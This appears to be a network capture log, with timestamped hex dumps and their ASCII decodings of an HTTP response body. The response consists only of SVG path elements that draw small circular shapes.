                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC1554INData Raw: 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 33 31 2e 35 37 2c 32 39 37 2e 38 34 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 32 2d 32 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 33 31 2e 33 34 2c 32 39 30 2e 39 31 61 31 2e 37
                                                                                                                                                                                                                                                                                        Data Ascii: 0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"></path><path class="cls-4" d="M731.57,297.84a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.39,2.39,0,0,1,.52-2.88,2.24,2.24,0,0,1,2.89,0,2.12,2.12,0,0,1,.16,2.86"></path><path class="cls-4" d="M731.34,290.91a1.7
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC1570INData Raw: 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 34 39 2e 34 32 2c 32 30 30 2e 30 36 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 34 39 2e 31 39 2c 31 39 33 2e 31 32 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d
                                                                                                                                                                                                                                                                                        Data Ascii: th><path class="cls-4" d="M749.42,200.06a1.72,1.72,0,0,1-.78,2.23,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.11,2.11,0,0,1,.16,2.85"></path><path class="cls-4" d="M749.19,193.12a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC1586INData Raw: 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 34 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 38 30 2e 36 35 2c 32 38 39 2e 32 34 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32
                                                                                                                                                                                                                                                                                        Data Ascii: ,1.72,0,0,1-.78,2.23,2.5,2.5,0,0,1-3.33-.94,2.37,2.37,0,0,1,.51-2.88,2.24,2.24,0,0,1,2.89,0,2.12,2.12,0,0,1,.16,2.86"></path><path class="cls-4" d="M780.65,289.24a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC1602INData Raw: 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 32 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 39 38 2e 35 2c 31 39 31 2e 34 35 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68
                                                                                                                                                                                                                                                                                        Data Ascii: .34-.94,2.41,2.41,0,0,1,.52-2.89,2.25,2.25,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"></path><path class="cls-4" d="M798.5,191.45a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"></path
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC1618INData Raw: 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 30 2c 32 38 37 2e 35 37 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 32 39 2e 37 32 2c 32 38 30 2e 36 33 61 31 2e 37 32 2c 31 2e 37
                                                                                                                                                                                                                                                                                        Data Ascii: 0,1,2.89,0,2.11,2.11,0,0,1,.16,2.86"></path><path class="cls-4" d="M830,287.57a1.72,1.72,0,0,1-.78,2.23,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"></path><path class="cls-4" d="M829.72,280.63a1.72,1.7
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC1634INData Raw: 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 37 2e 38 31 2c 31 38 39 2e 37 39 41 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2c 38 34 37 2c 31 39 32 61 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 37 2e 35 37 2c 31 38 32 2e 38 35 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 31
                                                                                                                                                                                                                                                                                        Data Ascii: 0,1,.16,2.86"></path><path class="cls-4" d="M847.81,189.79A1.72,1.72,0,0,1,847,192a2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.9,0,2.11,2.11,0,0,1,.15,2.85"></path><path class="cls-4" d="M847.57,182.85a1.73,1.73,0,0,1-.78,2.24,2.51
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC1650INData Raw: 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 39 2e 32 37 2c 32 38 35 2e 39 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 39 2c 32 37 39 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35
                                                                                                                                                                                                                                                                                        Data Ascii: s="cls-4" d="M879.27,285.9a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"></path><path class="cls-4" d="M879,279a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.5
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC1666INData Raw: 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 39 36 2e 38 38 2c 31 38 31 2e 31 38 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 34 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30
                                                                                                                                                                                                                                                                                        Data Ascii: 0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.85"></path><path class="cls-4" d="M896.88,181.18a1.72,1.72,0,0,1-.78,2.24,2.51,2.51,0,0,1-3.33-.94,2.39,2.39,0,0,1,.51-2.89,2.24,2.24,0,0,1,2.89,0
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC1682INData Raw: 2d 33 2e 33 34 2d 31 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 38 2e 33 35 2c 32 37 37 2e 33 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70
                                                                                                                                                                                                                                                                                        Data Ascii: -3.34-1,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"></path><path class="cls-4" d="M928.35,277.3a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.11,2.11,0,0,1,.15,2.85"></path><p
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC1698INData Raw: 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 33 38 2e 32 31 2c 32 39 33 2e 32 34 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 33 38 2e 34 34 2c 33 30 30 2e 30 37 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37
                                                                                                                                                                                                                                                                                        Data Ascii: 0,0,1-.16-2.82"></path><path class="cls-4" d="M1038.21,293.24a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"></path><path class="cls-4" d="M1038.44,300.07a1.7,1.7,0,0,1,.77-2.2,2.47
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC1714INData Raw: 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 30 37 2e 34 35 2c 32 30 35 2e 34 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 30 37 2e 36 39 2c 32 31 32 2e 32 34 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d
                                                                                                                                                                                                                                                                                        Data Ascii: cls-4" d="M1007.45,205.41a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"></path><path class="cls-4" d="M1007.69,212.24a1.69,1.69,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC1730INData Raw: 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 37 36 2e 39 33 2c 31 32 34 2e 34 32 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 37 37 2e 31 36 2c 31 33 31 2e 32 34 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34
                                                                                                                                                                                                                                                                                        Data Ascii: .08,0,0,1-.15-2.81"></path><path class="cls-4" d="M976.93,124.42a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.92,2.38,2.38,0,0,1-.51,2.85,2.22,2.22,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"></path><path class="cls-4" d="M977.16,131.24a1.7,1.7,0,0,1,.77-2.2,2.4
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC1746INData Raw: 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 35 39 2e 38 32 2c 32 33 34 2e 33 37 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d
                                                                                                                                                                                                                                                                                        Data Ascii: -.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"></path><path class="cls-4" d="M959.82,234.37a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"></path><path class="cls-4" d="M
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC1762INData Raw: 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 39 2e 33 2c 31 35 33 2e 33 37 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c
                                                                                                                                                                                                                                                                                        Data Ascii: ,1,3.29.93,2.37,2.37,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"></path><path class="cls-4" d="M929.3,153.37a1.69,1.69,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.1,2.1,0,0,1-.15-2.82"></path><
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC1778INData Raw: 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 31 32 2e 31 38 2c 32 36 33 2e 33 33 61 31 2e 37 31 2c 31 2e 37 31 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 31 2c 32 2e 34 39 2c 32 2e 34 39 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c
                                                                                                                                                                                                                                                                                        Data Ascii: 2.2,2.47,2.47,0,0,1,3.28.92,2.37,2.37,0,0,1-.5,2.85,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.81"></path><path class="cls-4" d="M912.18,263.33a1.71,1.71,0,0,1,.77-2.21,2.49,2.49,0,0,1,3.29.93,2.37,2.37,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC1794INData Raw: 4d 38 38 31 2e 34 33 2c 31 37 35 2e 35 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 38 31 2e 36 36 2c 31 38 32 2e 33 33 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 32 2c
                                                                                                                                                                                                                                                                                        Data Ascii: M881.43,175.5a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.16-2.81"></path><path class="cls-4" d="M881.66,182.33a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.28.92,2.37,2.37,0,0,1-.5,2.85,2.22,
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:55 UTC1810INData Raw: 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 36 34 2e 33 31 2c 32 38 35 2e 34 35 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 36 34 2e 35 34 2c 32 39 32 2e 32 38 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33
                                                                                                                                                                                                                                                                                        Data Ascii: </path><path class="cls-4" d="M864.31,285.45a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"></path><path class="cls-4" d="M864.54,292.28a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93
